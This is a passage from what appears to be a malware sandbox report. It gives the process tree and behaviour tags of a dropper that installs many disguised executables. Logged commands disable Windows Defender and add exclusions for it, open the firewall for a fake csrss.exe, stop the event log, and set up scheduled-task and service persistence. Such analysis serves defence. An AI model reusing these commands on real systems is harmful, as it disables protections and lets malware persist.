rN5PhBPG1JLMbW1HxIHs3JRl.exe RegAsm.exe PID 1672 wrote to memory of 2092 1672 rN5PhBPG1JLMbW1HxIHs3JRl.exe RegAsm.exe PID 4784 wrote to memory of 2124 4784 BTgSRN4g3JmlVuYdJeoWlWRy.exe RegAsm.exe PID 4784 wrote to memory of 2124 4784 BTgSRN4g3JmlVuYdJeoWlWRy.exe RegAsm.exe PID 4784 wrote to memory of 2124 4784 BTgSRN4g3JmlVuYdJeoWlWRy.exe RegAsm.exe PID 1672 wrote to memory of 3452 1672 rN5PhBPG1JLMbW1HxIHs3JRl.exe RegAsm.exe PID 1672 wrote to memory of 3452 1672 rN5PhBPG1JLMbW1HxIHs3JRl.exe RegAsm.exe PID 1672 wrote to memory of 3452 1672 rN5PhBPG1JLMbW1HxIHs3JRl.exe RegAsm.exe PID 4784 wrote to memory of 2060 4784 BTgSRN4g3JmlVuYdJeoWlWRy.exe RegAsm.exe PID 4784 wrote to memory of 2060 4784 BTgSRN4g3JmlVuYdJeoWlWRy.exe RegAsm.exe PID 4784 wrote to memory of 2060 4784 BTgSRN4g3JmlVuYdJeoWlWRy.exe RegAsm.exe PID 1672 wrote to memory of 3452 1672 rN5PhBPG1JLMbW1HxIHs3JRl.exe RegAsm.exe PID 1672 wrote to memory of 3452 1672 rN5PhBPG1JLMbW1HxIHs3JRl.exe RegAsm.exe PID 1672 wrote to memory of 3452 1672 rN5PhBPG1JLMbW1HxIHs3JRl.exe RegAsm.exe PID 1672 wrote to memory of 3452 1672 rN5PhBPG1JLMbW1HxIHs3JRl.exe RegAsm.exe PID 1672 wrote to memory of 3452 1672 rN5PhBPG1JLMbW1HxIHs3JRl.exe RegAsm.exe PID 4784 wrote to memory of 2060 4784 BTgSRN4g3JmlVuYdJeoWlWRy.exe RegAsm.exe PID 4784 wrote to memory of 2060 4784 BTgSRN4g3JmlVuYdJeoWlWRy.exe RegAsm.exe PID 4784 wrote to memory of 2060 4784 BTgSRN4g3JmlVuYdJeoWlWRy.exe RegAsm.exe PID 4784 wrote to memory of 2060 4784 BTgSRN4g3JmlVuYdJeoWlWRy.exe RegAsm.exe -
outlook_office_path 1 IoCs
Processes:
O9DHgLkl0NUvjFCrxs7X4Nwz.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 O9DHgLkl0NUvjFCrxs7X4Nwz.exe -
outlook_win_path 1 IoCs
Processes:
O9DHgLkl0NUvjFCrxs7X4Nwz.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 O9DHgLkl0NUvjFCrxs7X4Nwz.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\1714588385.7011812_setup.exe"C:\Users\Admin\AppData\Local\Temp\1714588385.7011812_setup.exe"1⤵
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Documents\SimpleAdobe\21TYPfMnkkSbr5d7azCiFo2v.exeC:\Users\Admin\Documents\SimpleAdobe\21TYPfMnkkSbr5d7azCiFo2v.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "OBGPQMHF"3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "OBGPQMHF" binpath= "C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe" start= "auto"3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "OBGPQMHF"3⤵
- Launches sc.exe
-
C:\Users\Admin\Documents\SimpleAdobe\H06PndcrWiIaVx5PSdNTfHA2.exeC:\Users\Admin\Documents\SimpleAdobe\H06PndcrWiIaVx5PSdNTfHA2.exe2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵
-
C:\Users\Admin\Documents\SimpleAdobe\H06PndcrWiIaVx5PSdNTfHA2.exe"C:\Users\Admin\Documents\SimpleAdobe\H06PndcrWiIaVx5PSdNTfHA2.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"4⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes5⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\SimpleAdobe\nW4waGBVRtQJr0IGyv9rf_uR.exeC:\Users\Admin\Documents\SimpleAdobe\nW4waGBVRtQJr0IGyv9rf_uR.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\SimpleAdobe\ypy5d_A5K61R6kYnPCE2aQ44.exeC:\Users\Admin\Documents\SimpleAdobe\ypy5d_A5K61R6kYnPCE2aQ44.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSE4E2.tmp\Install.exe.\Install.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSF453.tmp\Install.exe.\Install.exe /rfpczdidl "525403" /S4⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"5⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 67⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 68⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 67⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 68⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 67⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 68⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 67⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 68⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force9⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"5⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bhpuaaonuqVoelUvgo" /SC once /ST 18:37:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSF453.tmp\Install.exe\" cY /lDRdidQrKT 525403 /S" /V1 /F5⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bhpuaaonuqVoelUvgo"5⤵
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn bhpuaaonuqVoelUvgo6⤵
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn bhpuaaonuqVoelUvgo7⤵
-
C:\Users\Admin\Documents\SimpleAdobe\xMZwwEzPK44PSgfAXefyTRer.exeC:\Users\Admin\Documents\SimpleAdobe\xMZwwEzPK44PSgfAXefyTRer.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-BONOU.tmp\xMZwwEzPK44PSgfAXefyTRer.tmp"C:\Users\Admin\AppData\Local\Temp\is-BONOU.tmp\xMZwwEzPK44PSgfAXefyTRer.tmp" /SL5="$4020C,4844569,54272,C:\Users\Admin\Documents\SimpleAdobe\xMZwwEzPK44PSgfAXefyTRer.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe"C:\Users\Admin\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe" -i4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe"C:\Users\Admin\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe" -s4⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\SimpleAdobe\BTgSRN4g3JmlVuYdJeoWlWRy.exeC:\Users\Admin\Documents\SimpleAdobe\BTgSRN4g3JmlVuYdJeoWlWRy.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2060 -s 21124⤵
- Program crash
-
C:\Users\Admin\Documents\SimpleAdobe\rN5PhBPG1JLMbW1HxIHs3JRl.exeC:\Users\Admin\Documents\SimpleAdobe\rN5PhBPG1JLMbW1HxIHs3JRl.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1672 -s 3323⤵
- Program crash
-
C:\Users\Admin\Documents\SimpleAdobe\O9DHgLkl0NUvjFCrxs7X4Nwz.exeC:\Users\Admin\Documents\SimpleAdobe\O9DHgLkl0NUvjFCrxs7X4Nwz.exe2⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
- outlook_office_path
- outlook_win_path
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 16123⤵
- Program crash
-
C:\Users\Admin\Documents\SimpleAdobe\_nmI4eGVgzjJ4g_Ia4tRhBBX.exeC:\Users\Admin\Documents\SimpleAdobe\_nmI4eGVgzjJ4g_Ia4tRhBBX.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe3⤵
-
C:\Users\Admin\Documents\SimpleAdobe\ir75MsIvsiG7rQAfaFb5x56i.exeC:\Users\Admin\Documents\SimpleAdobe\ir75MsIvsiG7rQAfaFb5x56i.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3544 -s 21443⤵
- Program crash
-
C:\Users\Admin\Documents\SimpleAdobe\sJfF7bgkUqNIFOBVdgKnJ3Rj.exeC:\Users\Admin\Documents\SimpleAdobe\sJfF7bgkUqNIFOBVdgKnJ3Rj.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV202_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV202.exe" /tn "MSIUpdaterV202_93c4750d07be7885c8f839a66372e48f HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV202_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV202.exe" /tn "MSIUpdaterV202_93c4750d07be7885c8f839a66372e48f LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\heidiATdEteiC56Cg\oDZex1P_CrS6FyhU7GWe.exe"C:\Users\Admin\AppData\Local\Temp\heidiATdEteiC56Cg\oDZex1P_CrS6FyhU7GWe.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
-
C:\Users\Admin\Documents\SimpleAdobe\BkPeq6sStPIJt6eQzR9iKjCJ.exeC:\Users\Admin\Documents\SimpleAdobe\BkPeq6sStPIJt6eQzR9iKjCJ.exe2⤵
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops Chrome extension
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"3⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcf12eab58,0x7ffcf12eab68,0x7ffcf12eab784⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1528 --field-trial-handle=2340,i,12687797519338882597,10853110364358141588,131072 /prefetch:24⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1880 --field-trial-handle=2340,i,12687797519338882597,10853110364358141588,131072 /prefetch:84⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1896 --field-trial-handle=2340,i,12687797519338882597,10853110364358141588,131072 /prefetch:84⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2992 --field-trial-handle=2340,i,12687797519338882597,10853110364358141588,131072 /prefetch:14⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3000 --field-trial-handle=2340,i,12687797519338882597,10853110364358141588,131072 /prefetch:14⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4228 --field-trial-handle=2340,i,12687797519338882597,10853110364358141588,131072 /prefetch:14⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4404 --field-trial-handle=2340,i,12687797519338882597,10853110364358141588,131072 /prefetch:84⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4528 --field-trial-handle=2340,i,12687797519338882597,10853110364358141588,131072 /prefetch:84⤵
-
C:\Users\Admin\Documents\SimpleAdobe\UiDDocf0sy_A_v4KXEF0FUfY.exeC:\Users\Admin\Documents\SimpleAdobe\UiDDocf0sy_A_v4KXEF0FUfY.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="C:\Users\Admin\AppData\Local\Temp\Extension"3⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcf57aab58,0x7ffcf57aab68,0x7ffcf57aab784⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1512 --field-trial-handle=1816,i,16179000843585878626,2234521633104328558,131072 /prefetch:24⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1952 --field-trial-handle=1816,i,16179000843585878626,2234521633104328558,131072 /prefetch:84⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2052 --field-trial-handle=1816,i,16179000843585878626,2234521633104328558,131072 /prefetch:84⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2992 --field-trial-handle=1816,i,16179000843585878626,2234521633104328558,131072 /prefetch:14⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3000 --field-trial-handle=1816,i,16179000843585878626,2234521633104328558,131072 /prefetch:14⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3992 --field-trial-handle=1816,i,16179000843585878626,2234521633104328558,131072 /prefetch:14⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4448 --field-trial-handle=1816,i,16179000843585878626,2234521633104328558,131072 /prefetch:14⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4576 --field-trial-handle=1816,i,16179000843585878626,2234521633104328558,131072 /prefetch:84⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4692 --field-trial-handle=1816,i,16179000843585878626,2234521633104328558,131072 /prefetch:84⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4540 --field-trial-handle=1816,i,16179000843585878626,2234521633104328558,131072 /prefetch:84⤵
-
